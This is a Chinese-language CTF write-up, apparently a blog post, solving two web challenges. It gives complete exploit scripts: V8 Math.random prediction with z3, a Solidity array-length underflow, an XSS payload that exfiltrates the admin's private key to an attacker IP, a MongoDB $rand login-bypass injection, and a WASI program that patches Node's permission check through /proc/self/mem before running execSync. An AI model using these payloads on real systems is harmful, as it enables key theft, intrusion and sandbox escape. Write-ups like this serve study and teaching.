#!\/usr\/bin\/python3\r\nimport z3\r\nimport struct\r\n\r\ndef base_fromf(x):\r\n ret = 0.0\r\n base = 1\/36\r\n for i in range(len(x)):\r\n ret += base * int(x[i], 36)\r\n base \/= 36\r\n return ret\r\n\r\ndef base_tof(x):\r\n ret = ''\r\n while x > 1e-4:\r\n ret += '0123456789abcdefghijklmnopqrstuvwxyz'[int(x*36)]\r\n x = x*36 - int(x*36)\r\n return ret\r\n\r\ndef check(sequence):\r\n sequence = sequence[::-1]\r\n\r\n solver = z3.Solver()\r\n\r\n se_state0, se_state1 = z3.BitVecs(\"se_state0 se_state1\", 64)\r\n\r\n for i in range(len(sequence)):\r\n se_s1 = se_state0\r\n se_s0 = se_state1\r\n se_state0 = se_s0\r\n se_s1 ^= se_s1 << 23\r\n se_s1 ^= z3.LShR(se_s1, 17) # Logical shift instead of Arthmetric shift\r\n se_s1 ^= se_s0\r\n se_s1 ^= z3.LShR(se_s0, 26)\r\n se_state1 = se_s1\r\n\r\n if isinstance(sequence[i], str): \r\n solver.add(z3.BitVec(sequence[i], 64) == z3.LShR(se_state0, 12))\r\n continue\r\n\r\n float_64 = struct.pack(\"d\", sequence[i] + 1)\r\n u_long_long_64 = struct.unpack(\"<Q\", float_64)[0]\r\n\r\n # Get the lower 52 bits (mantissa)\r\n mantissa = u_long_long_64 & ((1 << 52) - 1)\r\n\r\n mask = ((1 << 64) - 1) & ~((1 << 8) - 1)\r\n # Compare Mantissas ( except lower 8 digits )\r\n solver.add((int(mantissa) & mask) == (z3.LShR(se_state0, 12) & mask))\r\n\r\n if solver.check() == z3.sat:\r\n return solver.model()\r\n return False\r\n\r\ndef answer(model):\r\n states = {}\r\n for state in model.decls():\r\n states[state.__str__()] = model[state]\r\n\r\n print(states)\r\n\r\n state0 = states[\"se_state0\"].as_long()\r\n\r\n for state in model.decls():\r\n if (mat:=state.__str__()).startswith('mat'):\r\n \r\n u_long_long_64 = (states[mat].as_long() >> 0) | 0x3FF0000000000000\r\n float_64 = struct.pack(\"<Q\", u_long_long_64)\r\n prev_sequence = struct.unpack(\"d\", float_64)[0]\r\n prev_sequence -= 1\r\n\r\n print(mat, prev_sequence, base_tof(prev_sequence))\r\n\r\norg = ['mat0','mat1','mat2','mat3','mat4','mat5']\r\n\r\ndef getapd(n):\r\n import requests\r\n ret = []\r\n for i in range(n):\r\n res = requests.post('http:\/\/ctf2024-entry.r3kapig.com:32090\/api\/backend', data='{\"js', headers={'Content-Type': 'application\/json'})\r\n print(i, num:=res.json()['data']['id'])\r\n ret.append(num)\r\n ret = ret[1:] # first for check\r\n print('')\r\n return ret\r\n\r\n# Array.from(Array(100), ()=>(Math.random().toString(36).substring(2).slice(0,10)))\r\napd = getapd(10)\r\n\r\napd = list(map(base_fromf, apd))\r\nprint(apd)\r\nmodel = check(org + apd)\r\nif model is False:\r\n print('unsolvable')\r\nelse:\r\n answer(model)<\/pre>\nPython \u7684 36 \u8fdb\u5236\u8f6c 10 \u8fdb\u5236\u5c0f\u6570\u8fd8\u6709\u70b9\u7cbe\u5ea6\u4e22\u5931\uff0c\u884c\u4e3a\u4e0d\u4e00\u81f4\uff0c\u5f88\u96be\u5d29\uff0c\u7ed3\u679c\u62f7\u5230 Node.JS \u4e0a\u9762\u518d\u8f6c\u3002<\/p>\n
\u6709\u4e86\u91d1\u5e01\u4ee5\u540e\u5c31\u53ef\u4ee5\u8fdb\u884c\u667a\u80fd\u5408\u7ea6\u7684\u94fe\u4e0a\u64cd\u4f5c\uff0c\u8fd9\u4e0a\u8fb9\u80fd register\uff0cpublish\uff0cedit\uff0c\u4f46\u95ee\u9898\u662f\uff0c\u90fd\u53ea\u80fd\u64cd\u4f5c\u81ea\u5df1\u7684\uff0c\u4e5f\u5c31\u662f sender.address\uff0c\u6ca1\u6cd5\u4fee\u6539\u522b\u4eba\uff0c\u6216\u8005\u8bf4 admin \u7684 Posts \u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-chain-operation.png\")
<\/p>\n
\u518d\u4ed4\u7ec6\u770b\u770b\u8fd9\u91cc\uff0c\u8fd9\u4e2a undo() \u529f\u80fd\uff0c\u9996\u5148\u628a length \u51cf\u4e86 1\uff0c\u7136\u540e\u518d\u5224\u65ad\u5b83\u662f\u5426 >=0\u3002\u770b\u8d77\u6765\u597d\u50cf\u6ca1\u95ee\u9898\uff1f\u56e0\u4e3a require() \u4e0d\u6ee1\u8db3\uff0c\u4ea4\u6613\u5c31\u4e0d\u4f1a\u6210\u529f\u3002\u518d\u8bf4\u4e86\uff0c\u5c31\u7b97\u662f\u8d1f\u6570\u53c8\u80fd\u600e\u4e48\u6837\u3002\u7136\u540e\u53ef\u4ee5\u53d1\u73b0\uff0clength \u5728 solidity \u91cc\u662f\u4e2a uint256 \u7c7b\u578b\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4 0-1 \u4f1a\u4e0b\u6ea2\u51fa\u81f3 2^256-1 \u6700\u5927\u503c\uff0c\u5bfc\u81f4\u8be5\u6570\u7ec4\u53ef\u4ee5\u5bf9\u4efb\u610f\u7684 offset \u8fdb\u884c\u8bbf\u95ee\uff0c\u7406\u8bba\u4e0a\u5f62\u6210\u4efb\u610f\u8bfb\u5199\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-chain-undo.png\")
<\/p>\n
\u8fd9\u91cc\u4fbf\u9700\u8981\u4e00\u4e9b solidity memory layout \u7684\u77e5\u8bc6\u3002<\/p>\n
https:\/\/docs.soliditylang.org\/en\/v0.8.17\/internals\/layout_in_storage.html<\/a><\/p>\n\u5bf9\u7740\u5b83\u7684\u5408\u7ea6\uff0cversion \u5360\u636e slot0\uff0c\u6211\u4eec\u5728\u7684 postMapping \u5bf9\u5e94 slot4\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0cpostMapping[address] \u5bf9\u5e94\u7684 slot \u4e3a keccak256(bytes32(account) + bytes32(4))<\/code> \u3002\u7531\u4e8e Post[] \u53c8\u662f dynamic array\uff0c\u9700\u8981\u5bf9\u4e4b\u524d\u5f97\u5230\u7684\u5730\u5740\u518d\u6b21 keccak256()\uff0c\u5f97\u5230\u8be5\u6570\u7ec4\u7684\u8d77\u59cb slot\u3002\u6570\u7ec4\u5185\u5404\u5143\u7d20\u5b58\u653e\u5730\u5740\u4e3a keccak256(\u8d77\u59cbslot + index)<\/code>\u3002<\/p>\n![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-blog-solidity-struct.png\")
<\/p>\n
\u6709\u4e86\u8be5\u6ea2\u51fa\u4e4b\u540e\uff0c\u7531\u4e8e solidity \u5bf9\u6bcf\u4e2a\u5408\u7ea6\u5171\u7528\u4e00\u4e2a 2^256 slot \u5927\u5c0f\u7684\u5730\u5740\u7a7a\u95f4\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u7531\u6211\u4eec\u7684 Post[] \u662f\u53ef\u4ee5\u8bbf\u95ee\u5230\u5bf9\u5e94 admin \u7684 Post[] \u6570\u7ec4\u7684\uff0c\u53ea\u662f\u9700\u8981\u6ce8\u610f\u5230\u4e00\u4e9b\u7b80\u5355\u7684\u8ba1\u7b97\u3002\u8fd9\u91cc\u8fd8\u8981\u7279\u522b\u6ce8\u610f\uff0c\u7531\u4e8e struct Post \u5360 3 \u4e2a slot\uff0c\u6240\u4ee5\u8ba1\u7b97 offset \u65f6\u9700\u8981\u9664\u4ee5 3\uff0c\u5e76\u4fdd\u8bc1\u80fd\u591f\u6574\u9664\uff0c\u5426\u5219\u9700\u8981\u66f4\u6362\u5730\u5740\u7ee7\u7eed\u3002<\/p>\n
mypos = keccak256(keccak256(bytes32(account) + bytes32(4)))\r\nadmin = '0x04478cD6BD7DE5f721a88d25A2f44edba2627276'[2:].lower() # <--- admin public address\r\napos = keccak256(keccak256(bytes32(admin) + bytes32(4)))\r\n\r\noffset = int(apos, 16) - int(mypos, 16)\r\nif offset < 0:\r\n offset += 2**256\r\nassert(offset % 3 == 0)\r\noffset \/\/= 3<\/pre>\n\u8fd9\u6837\u5f97\u51fa\u7684 offset\uff0c\u5c31\u662f\u5728\u8bbf\u95ee\u6211\u4eec\u7684 Post[] \u6570\u7ec4\u65f6\uff0c\u6307\u5b9a\u6b64 index \u4fbf\u80fd\u795e\u5947\u5730\u8bbf\u95ee\u5230 admin \u7684\u7b2c\u4e00\u7bc7 Post\uff01\u540c\u7406\uff0c\u5c31\u53ef\u4ee5 edit() \u8fd9\u7bc7\u6587\u7ae0\u4e3a\u6076\u610f XSS payload\uff0c\u7136\u540e\u8ba9 admin \u53bb\u8bbf\u95ee\u3002<\/p>\n
\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u89e3\u51b3 XSS \u7684\u95ee\u9898\u3002\u6211\u4eec\u8981\u5077\u7684 private key \u5b83\u6070\u597d\u4e0d\u597d\uff0c\u4e0d\u5728 cookie \u91cc\uff0c\u4e5f\u4e0d\u5728 localStorage \u91cc\uff0c\u504f\u504f\u5c31\u5728 React \u5199\u7684\u524d\u7aef\u7684\u4e00\u4e2a Context (Provider) \u91cc\u3002\u8fd9\u548b\u6574\uff1f\u53bb\u9006\u7f16\u8bd1\u51fa\u6765\u7684 js \u80af\u5b9a\u662f\u4e0d\u53ef\u80fd\u7684\u3002\u5176\u5b9e\u518d\u60f3\u60f3\uff0c\u80fd\u53d1\u73b0\u5b83\u7684\u8fd9\u4e9b props \u80af\u5b9a\u662f\u5b58\u5728 DOM \u6811\u91cc\u7684\u3002\u5177\u4f53\u6765\u8bf4\u662f\u54ea\u91cc\uff1f\u4e09\u4e2a\u5b57\uff1a\u4e0d\u77e5\u9053\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/mw-react-dom-tree.png\")
<\/p>\n
\u56e0\u4e3a\u662f\u771f\u7684\u4e0d\u77e5\u9053\u3002\u6bcf\u6b21\u6e32\u67d3\u751f\u6210\u7684\u5b57\u7b26\u4e32\u662f\u968f\u673a\u7684\uff0c\u6211\u4eec\u53ea\u77e5\u9053 private key \u80af\u5b9a\u5728\u8fd9\u91cc\u5934\uff0c\u4f46\u662f\u65e0\u4ece\u627e\u8d77\u3002\u4e0d\u8fc7\u5176\u5b9e\u4e5f\u597d\u529e\uff0c\u90fd XSS \u80fd\u6267\u884c JS \u4e86\uff0c\u8ba9\u5b83\u76f4\u63a5\u5f00\u641c\u5457\u3002\u7b80\u5355\u5730\u6413\u4e00\u4e2a\u9012\u5f52\u67e5\u627e\u5c5e\u6027\u7684\u3002<\/p>\n
function findVal(object, key, path, depth) {\r\n var value;\r\n Object.keys(object).some(function(k) {\r\n if (k === key) {\r\n console.log(path);\r\n value = object[k];\r\n return true;\r\n }\r\n if (object[k] && typeof object[k] === 'object' && depth > 0) {\r\n value = findVal(object[k], key, path + '.' + k, depth - 1);\r\n return value !== undefined;\r\n }\r\n });\r\n return value;\r\n}\r\nfindVal(document.getElementById(\"root\"), \"privateKey\", '', 10)\r\n\/\/ .__reactContainer$q7dczn7vxl.stateNode.containerInfo.__reactContainer$q7dczn7vxl.stateNode.current.lastEffect.return.memoizedState.memoizedState<\/pre>\n\u641c\u51fa\u6765\u8def\u5f84\u53ef\u80fd\u4e0d\u552f\u4e00\uff0c\u4f46\u6709\u80af\u5b9a\u662f\u6709\u7684\u3002\u7136\u540e\u7528\u7ecf\u5178 img.src \u9001\u5230\u6211\u4eec\u670d\u52a1\u5668\u4e0a\u5373\u53ef\u3002<\/p>\n
\u81f3\u6b64\uff0c\u5df2\u7ecf\u5b8c\u6210\u4e86\u653b\u51fb\u94fe\u7684\u6240\u6709\u6b65\u9aa4\u3002<\/p>\n
V8 \u968f\u673a\u6570\u5411\u524d\u9884\u6d4b\uff0c\u8ba1\u7b97\u5145\u503c\u7801 ==> \u5728 Solidity \u5408\u7ea6\u4e0a slot \u4efb\u610f\u8bfb\u5199 ==> \u4fee\u6539 admin \u7684 Post \u5e76 XSS ==> prvkey \u7b7e\u540d\u5f97\u5230 flag<\/p>\n
import requests, web3, json, binascii\r\nfrom Crypto.Hash import keccak\r\nfrom web3 import Web3\r\nfrom eth_account.messages import encode_defunct\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32090'\r\n\r\nprvkey = '0x000000000000000000000000000000000000000000000000000000000000000b'\r\n\r\nres = requests.get(URL + '\/api\/backend').json()['data']['blog']\r\naddress = res['address']\r\nabi = res['abi']\r\n\r\nweb3 = Web3(Web3.HTTPProvider(URL + '\/rpc'))\r\naccount = web3.eth.account.from_key(prvkey).address\r\n\r\n# -----------\r\ndef bytes32(i):\r\n return binascii.unhexlify('%064x' % i).hex()\r\ndef keccak256(x):\r\n k = keccak.new(digest_bits=256)\r\n k.update(bytes.fromhex(x))\r\n return k.hexdigest()\r\n\r\nmypos = keccak256(keccak256(bytes32(int(account, 16)) + bytes32(4)))\r\nadmin = '0x04478cD6BD7DE5f721a88d25A2f44edba2627276' # <--- MODIFY TO ADMIN ADDRESS HERE\r\napos = keccak256(keccak256(bytes32(int(admin, 16)) + bytes32(4)))\r\n\r\nprint('from', mypos, '=>', apos)\r\noffset = int(apos, 16) - int(mypos, 16)\r\nif offset < 0:\r\n offset += 2**256\r\nprint('offset', bytes32(offset))\r\nassert(offset % 3 == 0)\r\n# -----------\r\n\r\ncode = 'MWP-nn4lpyib8s418b0t' # <--- MODIFY TO REDEEM CODE HERE\r\nmessage = encode_defunct(text = account + '|' + code)\r\ndata = {'code': code, 'address': account,\r\n 'signature': '0x'+bytes(web3.eth.account.sign_message(message, private_key=prvkey).signature).hex()}\r\nprint(data)\r\nres = requests.post(URL + '\/api\/recharge', json=data)\r\nprint(res.text)\r\n\r\nprint('connected', web3.is_connected())\r\nprint('blockchain', web3.eth.block_number)\r\nprint('my balance', web3.eth.get_balance(account))\r\n\r\nfrom web3.middleware import geth_poa_middleware\r\nweb3.middleware_onion.inject(geth_poa_middleware, layer=0)\r\n\r\ncontract = web3.eth.contract(address=address, abi=abi)\r\nprint('username_count', contract.functions.getUserNameCount().call())\r\n\r\ndef call(total_fee, func):\r\n transaction = {\r\n 'from': account,\r\n 'value': total_fee,\r\n 'gas': 3000000, # adjust the gas limit as needed\r\n 'gasPrice': web3.to_wei('5', 'gwei'), # adjust the gas price as needed\r\n 'nonce': web3.eth.get_transaction_count(account)\r\n }\r\n\r\n txn = func.build_transaction(transaction)\r\n signed = web3.eth.account.sign_transaction(txn, prvkey)\r\n txn_hash = web3.eth.send_raw_transaction(signed.rawTransaction)\r\n\r\n print(txn_hash.hex())\r\n\r\n web3.eth.wait_for_transaction_receipt(txn_hash.hex())\r\n print(web3.eth.get_transaction_receipt(txn_hash.hex()))\r\n\r\nusername = 'hello10'\r\nfee_per_byte = 5 * 10**12 # 5 szabo in wei\r\ntotal_fee = fee_per_byte * len(username)\r\nprint('registering')\r\ncall(total_fee, contract.functions.register(username=username))\r\n\r\nprint('username_count', contract.functions.getUserNameCount().call())\r\n\r\nprint('undo') # 1 finney\r\ncall(10 ** 15, contract.functions.undo())\r\n\r\n#print('read', web3.eth.get_storage_at(address, keccak256(apos)))\r\nprint('article', contract.functions.read(user=admin, id=0).call())\r\n\r\ntitle = 'mytitle'\r\ncontent = '''<img src=x onerror=\"var f=(o,t,d)=>{var v;Object.keys(o).some(function(k){if(k===t){v=o[k];return true;}if(o[k]&&typeof o[k]==='object'&&d>0){v=f(o[k],t,d-1);return v!==undefined;}});return v;};this.src='http:\/\/IP:POST\/?'+f(document.getElementById('root'),'privateKey',10);\" \/>'''\r\nfee_per_byte = 50 * 10**12\r\ntotal_fee = fee_per_byte * len(title + content)\r\nprint('editing')\r\ncall(total_fee, contract.functions.edit(id=offset\/\/3, title=title, content=content))\r\n\r\nprint('article', contract.functions.read(user=admin, id=0).call())\r\n\r\nres = requests.post(URL + '\/api\/bot')\r\nprint(res.text)\r\n\r\napv = input('the admin private key: ').strip()\r\nmessage = encode_defunct(text = admin.lower() + ': vivo flag')\r\ndata = {'message': message.body.decode(),\r\n 'signature': '0x'+bytes(web3.eth.account.sign_message(message, private_key=apv).signature).hex()}\r\nprint(data)\r\nres = requests.post(URL + '\/api\/flag', json=data)\r\nprint(res.text)<\/pre>\n<\/a>\u00a0<\/p>\n\n- web >> JustMongo
\n<\/strong><\/span><\/li>\n<\/ul>\n\u521a\u5f00\u59cb\u88ab\u9a97\u60e8\u4e86\uff0c\u8fd8\u4ee5\u4e3a\u8981\u9003\u9038 mongodb \u90a3\u4e2a mozjs\uff0c\u7ffb\u534a\u5929\u6e90\u4ee3\u7801\u65e0\u679c\u3002\u770b\u4e86 hint \u624d\u77e5\u9053\uff0c\u634f\u9ebb\u9ebb\u7684\uff0c\u539f\u6765\u53ef\u4ee5\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u3002<\/p>\n
\u4e0b\u4e86\u4e2a index.mjs \u770b\u770b\uff0c\u8fd9\u91cc query \u76f4\u63a5\u5e26\u8fdb db.findOne() \u80af\u5b9a\u662f\u6709\u95ee\u9898\u7684\u3002\u518d\u770b\u770b\uff0c\u5bc6\u7801\u5b58\u7684\u662f bcrypt \u52a0\u5bc6\u540e\u7684\uff0c\u4e5f\u5c31\u662f\u8bf4\u5373\u4f7f\u80fd\u628a\u5bc6\u7801\u6ce8\u51fa\u6765\u4e5f\u6ca1\u7528\uff0c\u5e94\u5f53\u8003\u8651\u767b\u5f55\u76f8\u5173\u903b\u8f91\u7684\u7ed5\u8fc7\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-index-mjs.png\")
<\/p>\n
\u521a\u5f00\u59cb\u672c\u6765\u60f3\u8ba9\u5b83\u76f4\u63a5\u8fd4\u56de\u4e2a\u56fa\u5b9a\u7684 username \u8ddf password\uff0c\u4f46\u662f MongoDB \u597d\u50cf\u4e0d\u652f\u6301\u8fd9\u79cd\u3002\u518d\u4e00\u770b\uff0c\u8fd9\u548b\u56de\u4e8b\uff0c\u5148 verifyUser() \u8dd1\u4e86\u4e00\u904d\uff0c\u540e\u9762\u83b7\u53d6 permium \u53c8 find() \u4e86\u4e00\u904d\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0c\u53ef\u4ee5\u5229\u7528\u8fd9\u4e24\u6b21 find() \u4e4b\u95f4\u7684\u5dee\u5f02\uff0c\u5bc6\u7801\u7528\u6211\u4eec\u7684\u68c0\u9a8c\u901a\u8fc7\uff0c\u7136\u540e premium \u7528 admin \u7684\u3002\u7b54\u6848\u5df2\u7ecf\u547c\u4e4b\u6b32\u51fa\u4e86\uff0c$rand{} \u4e00\u4e0b\u5c31\u5b8c\u4e8b\u4e86\u30021\/2 \u7684\u6982\u7387\u8fd4\u56de\u6211\u4eec\u7684 test \u7528\u6237\uff0c\u7528\u4e8e\u901a\u8fc7\u5bc6\u7801\u68c0\u9a8c\uff0c1\/2 \u7684\u6982\u7387\u8fd4\u56de admin\uff0c\u83b7\u53d6 premium\u3002<\/p>\n
{\"$expr\": {\"$eq\": [\"$username\", {\"$cond\": [{\"$gt\": [{\"$rand\": {}}, 0.4]}, \"admin\", \"test\"]}]}, \"password\": \"12345678\"}<\/pre>\n\u5dee\u4e0d\u591a\u5e73\u5747 5s \u5185\uff0c\u80fd\u7206\u51fa\u6765\u3002\u7136\u540e\u770b\u770b\u771f\u6b63\u9700\u8981\u7ed5\u8fc7\u7684 sandbox \u957f\u5565\u6837\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-sandbox.png\")
<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-sandbox-agent.png\")
<\/p>\n
\u770b\u4e86\u8001\u534a\u5929\uff0c\u5176\u4ed6\u90fd\u4e0d\u662f\u5173\u952e\u70b9\uff0c\u7b80\u5355\u6765\u8bf4\uff0c\u5c31\u662f\u8981\u7ed5\u8fc7 --experimental-permission<\/code>\u3002<\/p>\n\u6839\u636e\u5f80\u5e74\u7684 CVE\uff0c\u901a\u8fc7 require\uff0cInspector\/Worker \u7b49\u7ed5\u8fc7\uff0c\u5e94\u5f53\u53ef\u4ee5\u60f3\u5230\u8fd9\u91cc\u53ef\u80fd\u8fd8\u5b58\u5728\u67d0\u4e9b\u4e0d\u9075\u5b88\u8fd9\u73a9\u610f\u9650\u5236\u7684\u4e1c\u897f\u3002\u7136\u540e\u5c31\u5728 PR \u7684\u7b2c\u4e8c\u9875\uff08\u4e00\u5468\u524d\u53d1\u5e03\uff09\u7ffb\u5230\u4e86\u5173\u4e8e “prevent WASI exec” \u7684\u63cf\u8ff0\u3002<\/p>\n
https:\/\/github.com\/nodejs\/node\/commit\/3ab0499d434078676261512a67897f4c2f433e43<\/a><\/p>\n\u8fc7\u4e00\u773c\u5c31\u660e\u767d\u4e86\uff0c\u4e5f\u5c31\u662f\u8bf4 WASM \u8fd9\u73a9\u610f\u53ef\u4ee5\u7ed5\u8fc7\u6c99\u7bb1\u7684\u9650\u5236\uff0c\u4efb\u610f\u8bfb\u5199\u6587\u4ef6\u3002\u9898\u76ee\u73af\u5883\u91c7\u7528 node 20.14.0\uff0c\u867d\u7136\u5f88\u65b0\uff0c\u4f46\u8fd9\u4e2a issue \u66f4\u65b0\uff0c\u6240\u4ee5\u53ef\u4ee5\u5229\u7528\u3002<\/p>\n
\u5199\u8fd9\u73a9\u610f\u7684 wasm \u5b9e\u5728\u662f\u5934\u75bc\uff0c\u6587\u6863\u91cc\u4e5f\u4e0d\u8bf4\u6e05\u695a\uff0c\u8fd8\u5f97\u81ea\u5df1\u7ffb\u3002Node.JS \u91cc\u53ea\u63d0\u4f9b\u4e86 wasi_snapshot_preview1 \u7cfb\u5217\u7684\u6807\u51c6\u63a5\u53e3\u53ef\u4f9b\u8c03\u7528\uff0c\u5305\u62ec path_open\u3001fd_write\u3001fd_seek \u7b49\uff0c\u5565\u90fd\u5f97\u81ea\u5df1\u5b9e\u73b0\u3002<\/p>\n
https:\/\/nodejs.org\/api\/wasi.html<\/a><\/p>\nhttps:\/\/fossies.org\/linux\/wasm3\/source\/extra\/wasi_core.h<\/a><\/p>\n\u4e4b\u524d\u7684\u60f3\u6cd5\u662f\u5148\u5217\u76ee\u5f55\u770b\u770b\u6709\u4ec0\u4e48\u6548\u679c\uff0c\u867d\u7136\u8bfb\u5230 \/readflag \u7684\u65f6\u5019\u5df2\u7ecf\u6709\u70b9\u53d1\u614c\u4e86\uff0c\u4f46\u8fd8\u662f\u5199 wasm \u5199\u4e86\u4e00\u6bb5\u65f6\u95f4\uff0c\u5305\u62ec\u7531\u4e8e wasm \u4e2d\u6ca1\u6709\u56de\u663e\uff0c\u5176\u8f93\u51fa\u600e\u4e48\u8ddf Node.JS \u4ea4\u4e92\uff0c\u7b49\u7b49\u3002\u7136\u540e\u53d1\u73b0\u786e\u5b9e\u662f\u8981 RCE\uff0c\u8fd9\u4e0b\u96be\u53d7\u4e86\u3002<\/p>\n
\u4e0d\u8fc7\u597d\u5728\u53ef\u4ee5\u8bfb\u5199 \/proc\/self\/mem\uff0c\u7406\u8bba\u4e0a\u53ef\u4ee5\u91c7\u7528 pwn \u7684\u90a3\u79cd\u65b9\u5f0f\u52ab\u6301\u63a7\u5236\u6d41\uff0c\u8fd9\u91cc\u4f7f\u7528\u4e86\u4e00\u79cd\u6bd4\u8f83\u7b80\u5355\u7684\u5b9e\u73b0\uff0c\u5c31\u662f\u628a experimental-permissions \u5e26\u6765\u7684\u5f71\u54cd\u7ed9 patch \u6389\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-node-spawn.png\")
<\/p>\n
\u5728 native \u4ee3\u7801\u91cc\uff0c\u6700\u7ec8\u8c03\u7528\u7684\u90fd\u662f\u8fd9\u4e2a\u5b8f\uff0c\u6700\u540e\u8fdb\u5230 is_scope_granted()<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-node-scope.png\")
<\/p>\n
\u597d\u5728 node \u6ca1\u6709 PIE\uff0c\u800c\u4e14\u9898\u76ee\u73af\u5883\u4e2d\u7684\u7248\u672c\u53ef\u4ee5\u4e0b\u4e0b\u6765\uff0c\u6240\u4ee5\u8fd9\u91cc\u7684 offset \u90fd\u662f\u56fa\u5b9a\u7684\u3002<\/p>\n
![\"\"](\"https:\/\/cf.mnihyc.com\/blog\/wp-content\/uploads\/2024\/06\/jm-code-node-ida.png\")
<\/p>\n
\u8fd9\u51fd\u6570\u91cc\u8fb9\u968f\u4fbf\u6311 6 \u4e2a\u5b57\u8282\uff0c\u5199\u6210 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3<\/code> \u4e5f\u5c31\u662f mov eax, 1 ; retn<\/code> \u5373\u53ef\u3002
\n\u7528 wasm \u5b9e\u73b0\uff0c\u4e5f\u5c31\u662f\uff1a<\/p>\n\/\/ docker run --rm -v $(pwd):\/src -u $(id -u):$(id -g) emscripten\/emsdk emcc file_patch.c -o file_patch.wasm -s WASM=1 -s STANDALONE_WASM\r\n\r\n#include <wasi\/api.h>\r\n\r\n#define BUF_SIZE 1024\r\n\r\nunsigned long strlen(const char* str) {\r\n const char* p = str;\r\n unsigned long len = 0;\r\n while (*(p++)) len++;\r\n return len;\r\n}\r\n\r\n\/\/ Declare the external function\r\nextern void custom_write(int c) __attribute__((import_module(\"env\"), import_name(\"custom_write\")));\r\n\r\nvoid my_write(const char *entry, int length) {\r\n while (length--) custom_write(*(entry++)); \/\/ Call the custom Node.js function\r\n custom_write('\\n'); \/\/ Print newline\r\n}\r\n\r\nvoid handle_error(__wasi_errno_t err) {\r\n if (err != __WASI_ERRNO_SUCCESS) {\r\n my_write(\"err:\", 4); custom_write(err);\r\n __wasi_proc_exit(err);\r\n }\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n const char* wpath = \"\/proc\/self\/mem\";\r\n\r\n __wasi_errno_t status;\r\n __wasi_fd_t wfd;\r\n status = __wasi_path_open(3, 0, wpath, strlen(wpath),\r\n 0, __WASI_RIGHTS_FD_WRITE | __WASI_RIGHTS_FD_READ | __WASI_RIGHTS_FD_SEEK, 0, 0, &wfd);\r\n handle_error(status);\r\n\r\n __wasi_filesize_t noff;\r\n status = __wasi_fd_seek(wfd, 0x00e0ed57, __WASI_WHENCE_SET, &noff);\r\n handle_error(status);\r\n\r\n unsigned char filebuf[1024] = { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 };\r\n __wasi_ciovec_t iov = {\r\n .buf = filebuf,\r\n .buf_len = 6\r\n };\r\n size_t nread;\r\n status = __wasi_fd_write(wfd, &iov, 1, &nread);\r\n handle_error(status);\r\n\r\n __wasi_fd_close(wfd);\r\n\r\n my_write(\"suc\", 3);\r\n\r\n return 0;\r\n}<\/pre>\n\u5199\u5b8c\u4e4b\u540e Node.JS \u5c31\u8ddf\u6ca1\u6709\u9650\u5236\u4e00\u6837\u4e86\uff0c\u76f4\u63a5 execSync() \u8bfb flag \u5373\u53ef\u3002<\/p>\n
import { WASI } from 'node:wasi';\r\nimport { execSync } from 'node:child_process';\r\n\r\nexport async function main() {\r\n\r\nconst wasi = new WASI({\r\n version: 'preview1',\r\n args: ['mywasm', '\/', '\/proc\/self\/maps'],\r\n env: {},\r\n preopens: {\r\n '\/': '\/',\r\n },\r\n});\r\n\r\nlet s = '';\r\nfunction customWrite(c) {\r\n if (c > 128) s += c.toString(16);\r\n else s += String.fromCharCode(c)\r\n}\r\n\r\nawait (async () => {\r\n const wasm = await WebAssembly.compile(\r\n Buffer.from(\"[HEX]\", \"hex\"),\r\n );\r\n const instance = await WebAssembly.instantiate(wasm, {\r\n ...wasi.getImportObject(),\r\n env: {\r\n custom_write: customWrite,\r\n },\r\n });\r\n\r\n wasi.start(instance);\r\n})();\r\n\r\n\/\/return s;\r\nreturn execSync('\/readflag').toString();<\/pre>\n <\/p>\n
import requests\r\n\r\nURL = 'http:\/\/ctf2024-entry.r3kapig.com:32482'\r\n\r\ndata = {'username': 'test', 'password': '12345678'}\r\nres = requests.post(URL + '\/api\/register', json=data)\r\nprint(res.text)\r\n\r\nwhile True:\r\n data = {\"$expr\": {\"$eq\": [\"$username\", {\"$cond\": [{\"$gt\": [{\"$rand\": {}}, 0.4]}, \"admin\", \"test\"]}]}, \"password\": \"12345678\"}\r\n res = requests.post(URL + '\/api\/login', json=data)\r\n print(res.text)\r\n\r\n if res.status_code == 200:\r\n token = res.json()['token']\r\n res = requests.get(URL + '\/api\/session', params={'token': token})\r\n print(res.text)\r\n if res.json()['plan'] == 'premium':\r\n break\r\n\r\nwith open('file_patch.wasm', 'rb') as f:\r\n HEX = f.read().hex()\r\n\r\nmjs = '''\r\n \/\/ <--- above MJS code\r\n'''.replace('[HEX]', HEX)\r\n\r\ndata = {'code': mjs, 'token': token}\r\nres = requests.post(URL + '\/api\/run', json=data)\r\nprint(res.json())<\/pre>\n\u540e\u6ce8\uff1a\u6700\u540e\u63d0\u793a websocket \u4e86\u8fd8\u662f\u6ca1\u60f3\u5230\uff0c\u5411 parnet \u53d1 SIGUSR1 \u53ef\u4ee5\u76f4\u63a5\u6253\u5f00 inspector\uff0cdebug \u7236\u8fdb\u7a0b\uff0c\u5c31\u4e0e\u6c99\u7bb1\u5b8c\u5168\u65e0\u5173\u4e86\u3002<\/p>\n
